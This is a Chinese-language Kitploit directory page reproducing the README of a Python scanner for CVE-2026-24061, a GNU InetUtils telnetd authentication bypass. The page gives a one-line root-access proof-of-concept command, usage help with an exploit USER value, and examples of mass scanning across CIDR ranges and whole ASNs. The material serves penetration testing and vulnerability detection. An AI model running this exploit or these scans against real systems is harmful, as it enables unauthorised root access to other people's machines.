Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Twenty-Three-Scanner — CVE-2026-24061 - GNU InetUtils Telnetd 远程身份验证绕过 | Kitploit
工具/GitHubGitHub/madfxr/twenty-three-scanner
侦察漏洞扫描器漏洞利用信息收集网络安全渗透测试
GitHubmadfxr/twenty-three-scanner

Twenty-Three-Scanner

CVE-2026-24061 - GNU InetUtils Telnetd 远程身份验证绕过

查看仓库
46个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

🛰️ Twenty-Three Scanner

一个强大、快速且优雅的扫描器,用于检测受 CVE-2026-24061 影响的易受攻击的 Telnetd 服务。使用纯 Python 标准库构建——零外部依赖。

License: MIT Python 3.x Android Windows macOS Solaris FreeBSD Linux Offensive Security Ethical Hacking CVE-2026-24061 GNU InetUtils Telnetd


🔗 目录

  • ⚖️ 许可证
  • 🧩 功能特性
  • ☣️ 漏洞详情
    • ⚡ 服务状态
    • 🧪 概念验证(PoC)
    • 💥 受影响版本
    • 🧵 已修复版本
    • ⚔️ 攻击向量
    • 🚨 CVSS 评分
  • 🛠️ 安装
  • 📜 使用方法
  • 🎯 示例
  • ⚗️ 演示
  • 📖 参考资料

🧩 功能特性

  • 🚀 高性能扫描 – 多线程架构,可配置线程数量。
  • 🌐 灵活的目标输入 – 支持单个 IP、CIDR 范围、ASN 查询和基于文件的列表。
  • 📊 实时进度 – 基于 Unicode 的优美界面,带实时进度条。
  • 🤖 ASN 情报 – 自动从 RADB、BGPView 和 HackerTarget API 获取前缀。
  • 🌍 地理位置情报 – 从 ipapi API 实时获取 ASN、提供商和位置信息。
  • 💾 优雅中断 – 支持 CTRL+C 处理并自动保存结果。
  • 📝 详细日志 – 可配置的详细级别,便于调试。
  • 🛡️ 安全扫描 – 内置限制,防止意外的大规模扫描。
  • 🎨 清晰输出 – 专业的带边框表格和扫描摘要。
  • 📦 零依赖 – 仅使用纯 Python 3.x 标准库。

☣️ 漏洞详情

CVE-2026-24061 是 GNU InetUtils Telnetd 中的一个严重身份验证绕过漏洞,攻击者可通过利用 NEW-ENVIRON 选项处理机制,在未经身份验证的情况下远程获取 root 权限。


⚡ 服务状态

以下是目标主机端的 Telnetd 服务配置。

image


🧪 概念验证(PoC)

以下是此漏洞的概念验证(PoC),可在攻击者主机上手动执行,只需运行命令 USER="-f root" telnet -a <TARGET_HOST> 23 即可。

image


💥 受影响版本

  • GNU InetUtils >=1.9.3 <=2.7。
  • 各种嵌入式 Linux 发行版。
  • 具有易受攻击的 Telnetd 实现的物联网设备。

🧵 已修复版本

  • GNU InetUtils >=2.8。

⚔️ 攻击向量

该漏洞利用 telnet NEW-ENVIRON(RFC 1572) 选项协商中对 USER 环境变量的不当验证,允许攻击者注入诸如 -f root 之类的恶意值以绕过身份验证。


🚨 CVSS 评分

9.8(严重) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H。


🛠️ 安装

root@kitploit:~
# 克隆仓库
cd /opt
sudo git clone https://github.com/madfxr/Twenty-Three-Scanner.git
cd Twenty-Three-Scanner

# 赋予可执行权限
sudo chmod +x twenty-three-scanner.py

# 运行脚本
sudo python3 twenty-three-scanner.py -h

📜 使用方法

以下是 Twenty-Three Scanner 工具的手册,可用于检测漏洞 CVE-2026-24061 - GNU InetUtils Telnetd 远程身份验证绕过。

root@kitploit:~
usage: python3 twenty-three-scanner.py [-h] [-t TARGET] [-f FILE] [-a ASN] [-p PORT] [--threads N] [--user-value VALUE] [--connect-timeout SEC] [--read-timeout SEC] [--id-timeout SEC]
                                       [--max-hosts-per-cidr N] [--max-total-hosts N] [--skip-large-networks] [-o FILE] [-v]

CVE-2026-24061 - GNU InetUtils Telnetd 远程身份验证绕过

options:
  -h, --help            显示此帮助信息并退出

目标选项:
  -t TARGET, --target TARGET
                        目标 IP、CIDR 或逗号分隔列表(可多次使用)
  -f FILE, --file FILE  包含目标的文件(每行一个,支持 # 注释)
  -a ASN, --asn ASN     自治系统编号(例如,AS10111 或 10111)

扫描选项:
  -p PORT, --port PORT  目标端口,逗号分隔(默认:23)
  --threads N           并发线程数(默认:50)
  --user-value VALUE    用于漏洞利用的 USER 环境变量值(默认:'-f root')

超时选项:
  --connect-timeout SEC
                        TCP 连接超时时间(秒)(默认:3.0)
  --read-timeout SEC    套接字读取超时时间(秒)(默认:2.0)
  --id-timeout SEC      'id' 命令响应超时时间(秒)(默认:2.0)

限制选项:
  --max-hosts-per-cidr N
                        每个 CIDR 块的最大扫描主机数(默认:1024)
  --max-total-hosts N   所有目标的最大主机总数(默认:50000)
  --skip-large-networks
                        跳过大于 /16 的网络(避免意外扫描超大范围)

输出选项:
  -o FILE, --output FILE
                        将易受攻击的主机保存到文件(格式:IP:PORT)
  -v, --verbose         启用详细调试日志

🎯 示例

以下是一些命令使用示例。

root@kitploit:~
  # 扫描单个 IP 地址和单个端口
  sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23

  # 扫描单个 IP 地址和多个端口
  sudo python3 twenty-three-scanner.py -t 10.0.0.23 -p 23,2323

  # 扫描多个 IP 地址和单个端口
  sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23

  # 扫描多个地址和多个端口
  sudo python3 twenty-three-scanner.py -t 10.0.0.23,10.0.23.23 -p 23,2323

  # 扫描 CIDR 范围和单个端口并保存结果
  sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23 -o results.txt

  # 扫描 CIDR 范围和多个端口并保存结果
  sudo python3 twenty-three-scanner.py -t 192.168.23.0/23 -p 23,2323 -o results.txt

  # 从文件扫描单个 IP 地址、多个地址或 CIDR 范围,以及单个端口,使用自定义线程和输出
  sudo python3 twenty-three-scanner.py -f targets.txt -p 23 --threads 100 -o output.txt

  # 从文件扫描单个 IP 地址、多个地址或 CIDR 范围,以及多个端口,使用自定义线程和输出
  sudo python3 twenty-three-scanner.py -f targets.txt -p 23,2323 --threads 100 -o output.txt

  # 扫描 ASN 和单个端口,使用自定义线程
  sudo python3 twenty-three-scanner.py -a 10111 -p 23 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 -p 23 --threads 100

  # 扫描 ASN 和多个端口,使用自定义线程
  sudo python3 twenty-three-scanner.py -a 10111 -p 23,2323 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 -p 23,2323 --threads 100

  # 扫描 ASN,使用自定义限制和自定义线程
  sudo python3 twenty-three-scanner.py -a 10111 --max-hosts-per-cidr 2048 --threads 100
  sudo python3 twenty-three-scanner.py -a AS10111 --max-hosts-per-cidr 2048 --threads 100

⚗️ 演示

使用多个端口扫描单个 IP 地址。

image

使用单个端口扫描多个 IP 地址。

image

使用单个端口扫描 CIDR 范围。

image

使用多个端口扫描 ASN。

image

从文件扫描单个 IP 地址、多个地址或 CIDR 范围,以及单个端口,使用自定义线程和输出。

image


📖 参考资料

  • 严重的 GNU InetUtils telnetd 漏洞允许攻击者绕过登录并获取 root 权限
  • NVD - CVE-2026-24061
  • CVE 记录:CVE-2026-24061
  • Inetutils - GNU 网络工具
  • [SECURITY] [DLA 4453-1] inetutils 安全更新
  • GNU InetUtils 安全公告:telnet 远程身份验证绕过
  • GNU InetUtils 安全公告:telnetd 远程身份验证绕过
  • GNU InetUtils 安全公告:telnetd 远程身份验证绕过
  • GNU InetUtils 安全公告:telnetd 远程身份验证绕过
  • 回复:GNU InetUtils 安全公告:telnetd 远程身份验证绕过
  • 回复:GNU InetUtils 安全公告:telnetd 远程身份验证绕过
  • CVE-2026-24061 Telnet RCE 漏洞利用 - 由 SafeBreach Labs 提供
下载工具